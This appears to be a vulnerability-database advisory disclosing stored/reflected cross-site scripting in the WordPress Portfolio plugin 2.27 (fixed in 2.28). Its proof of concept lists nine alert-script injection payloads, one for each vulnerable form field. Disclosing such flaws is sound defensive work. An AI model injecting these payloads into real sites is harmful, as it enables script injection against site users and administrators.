WordPress Portfolio 2.27 Cross Site Scripting Vulnerability

ID 1337DAY-ID-24748
Type zdt
Reporter Madhu Akula
Modified 2015-12-18T00:00:00


WordPress Portfolio plugin version 2.27 suffers from a cross site scripting vulnerability.

                                            WordPress Portfolio 2.27 Cross Site Scripting Vulnerability

Plugin Name : Portfolio
Effected Version : 2.27 (and most probably lower version's if any)
Vulnerability : A3-Cross-Site Scripting (XSS)
Identified by : Madhu Akula

Technical Details
Minimum Level of Access Required : Administrator
PoC - (Proof of Concept) :
The following fields put the payload as below
tag-slug = “><script>alert(1)</script>
prtfl_date_text_field = “><script>alert(2)</script>
prtfl_link_text_field = “><script>alert(3)</script>
prtfl_shrdescription_text_field = “><script>alert(4)</script>
prtfl_description_text_field = “><script>alert(5)</script>
prtfl_svn_text_field = “><script>alert(6)</script>
prtfl_executor_text_field = “><script>alert(7)</script>
prtfl_screenshot_text_field = “><script>alert(8)</script>
prtfl_technologies_text_field = “><script>alert(9)</script>
Vulnerable Parameter : tag-slug, prtfl_date_text_field, prtfl_link_text_field, prtfl_shrdescription_text_field, prtfl_description_text_field, prtfl_svn_text_field, prtfl_executor_text_field, prtfl_screenshot_text_field, prtfl_technologies_text_field
Type of XSS : Reflected / Stored
Fixed in : 2.28

#  0day.today [2018-02-19]  #